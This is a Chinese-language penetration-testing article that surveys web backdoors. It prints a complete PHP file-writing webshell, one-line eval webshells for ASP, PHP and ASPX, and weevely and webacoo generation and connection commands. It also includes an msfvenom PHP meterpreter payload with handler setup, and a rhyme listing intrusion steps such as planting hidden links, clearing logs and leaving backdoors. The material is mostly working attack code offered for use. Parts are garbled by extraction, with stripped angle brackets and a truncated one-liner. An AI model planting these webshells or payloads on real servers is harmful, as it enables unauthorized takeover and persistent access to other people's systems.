在對(duì)一個(gè)web站點(diǎn)進(jìn)行滲透測(cè)試的滲透攻擊階段,一般會(huì)想辦法突破上傳限制,向目標(biāo)可執(zhí)行目錄中寫(xiě)入一個(gè)帶有攻擊性質(zhì)的腳本來(lái)協(xié)助獲取更大的服務(wù)器權(quán)限。
這里我們就一起來(lái)盤點(diǎn)一下常用的web后門吧
大馬與小馬
在幾年前很流行的網(wǎng)站入侵打油詩(shī)中有寫(xiě)
進(jìn)谷歌 找注入
沒(méi)注入 就旁注
沒(méi)旁注 用0day
沒(méi)0day 猜目錄
沒(méi)目錄 就嗅探
爆賬戶 找后臺(tái)
傳小馬 放大馬
拿權(quán)限 掛頁(yè)面
放暗鏈 清數(shù)據(jù)
清日志 留后門
其中的傳小馬上大馬就是我們要說(shuō)的小馬大馬了,小馬的功能一般都比較單一,作用一般是向服務(wù)器中寫(xiě)入文件數(shù)據(jù)。因?yàn)槠涔δ軉我坏奶匦,隱蔽性通常都比較高。有些網(wǎng)站對(duì)上傳文件大小做了限制,小馬因?yàn)檎加每臻g也小也能繞過(guò)這些限制
這里貼一個(gè)php小馬
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
form method="POST">
保存文件名: input type="text" name="file" size="60" value=" echo str_replace('\\','/',__FILE__) ?>">
br>br>
textarea name="text" COLS="70" ROWS="18" >textarea>
br>br>
input type="submit" name="submit" value="保存">
form>
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失敗!';
@fclose($fp);
}
?>
大馬一般就提供了更多的功能,例如輔助提權(quán),執(zhí)行sql語(yǔ)句,反彈shell等。
不過(guò)網(wǎng)上很多的大馬都加了后門,例如圖中的這款從mumaasp.com這個(gè)網(wǎng)站下載的一款大馬會(huì)將木馬的地址和密碼提交到http://www.mumaasp.com/xz/sx.asp這個(gè)網(wǎng)址

中國(guó)菜刀

中國(guó)菜刀和一句話木馬想必是大家最熟悉的了,中國(guó)菜刀支持asp、php、asp.net和jsp等web編程語(yǔ)言,小巧的中國(guó)菜刀還自帶了很多實(shí)用的功能。例如虛擬終端

還有例如安全掃描,定時(shí)鬧鐘,數(shù)據(jù)庫(kù)管理等功能,甚至內(nèi)置了一個(gè)網(wǎng)頁(yè)瀏覽器
使用方法也很簡(jiǎn)單,就是往目標(biāo)web服務(wù)器上傳相應(yīng)的一句話木馬
asp一句話木馬:
"pass"))%>
php一句話木馬:
@eval($_POST[pass]);?>
aspx一句話木馬:
%@ Page Language="Jscript"%>
%eval(Request.Item["pass"])%>
網(wǎng)上也有很多仿冒中國(guó)菜刀的官網(wǎng)發(fā)布加了后門的中國(guó)菜刀
在linux下也有很多替代中國(guó)菜刀的開(kāi)源產(chǎn)品,例如中國(guó)蟻劍和C刀
weevely
在kali linux中,我們用的比較多的就是這款php后門管理工具 weevely了。weevely支持的功能很強(qiáng)大,使用http頭進(jìn)行指令傳輸。唯一的缺陷就是只支持php

我們通過(guò)幫助可以看到,weevely的使用還是很簡(jiǎn)單的,首先我們?cè)?root目錄下生成一個(gè)名為weevely.php密碼為123的backdoor agent
weevely generate 123 /root/weevely.php
然后我們只要上傳到目標(biāo)服務(wù)器之后運(yùn)行
weevely 就能成功連接上了

metasploit
metasploit框架中其實(shí)也自帶了php的后門,并且配合meterpreter功能強(qiáng)大
在這里提一下正向連接和反向連接(bind_tcp reverse_tcp)
bind_tcp:在這里黑客主動(dòng)去連接目標(biāo)主機(jī),就叫作正向連接。適用的情況是服務(wù)器在外網(wǎng)的情況
reverse_tcp:在這個(gè)例子中反向連接就是被入侵的主機(jī)反過(guò)來(lái)來(lái)連接黑客,就叫作反向連接,在目標(biāo)服務(wù)器在內(nèi)網(wǎng)或有防火墻的情況下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中l(wèi)host為目標(biāo)服務(wù)器的地址 lport是目標(biāo)服務(wù)器會(huì)開(kāi)放的端口 -o后面是后門輸出的路徑
然后進(jìn)入msfconsole

xu
選擇exploit/multi/handler這個(gè)模塊
然后設(shè)置payload為php/meterpreter/bind_tcp
最后設(shè)置一下目標(biāo)的ip然后輸入run開(kāi)始監(jiān)聽(tīng)
觸發(fā)木馬的方法就是訪問(wèn)后門的網(wǎng)址

然后msfconsole如果有連接信息說(shuō)明已經(jīng)連接成功

使用方式可以參考meterpreter
參考鏈接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64編碼后隱藏在Cookie頭中,隱蔽性較強(qiáng),webacoo的缺點(diǎn)是不能指定密碼,所以。。。不推薦作為持續(xù)性攻擊的權(quán)限維持的選擇
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目錄下

上傳成功之后用命令
webacoo -t -u 來(lái)連接

成功后會(huì)生成一個(gè)仿真終端,可以使用load命令來(lái)加載模塊,之后可以進(jìn)行上傳下載,連接數(shù)據(jù)庫(kù)等操作。只是不能設(shè)置密碼是個(gè)硬傷。
|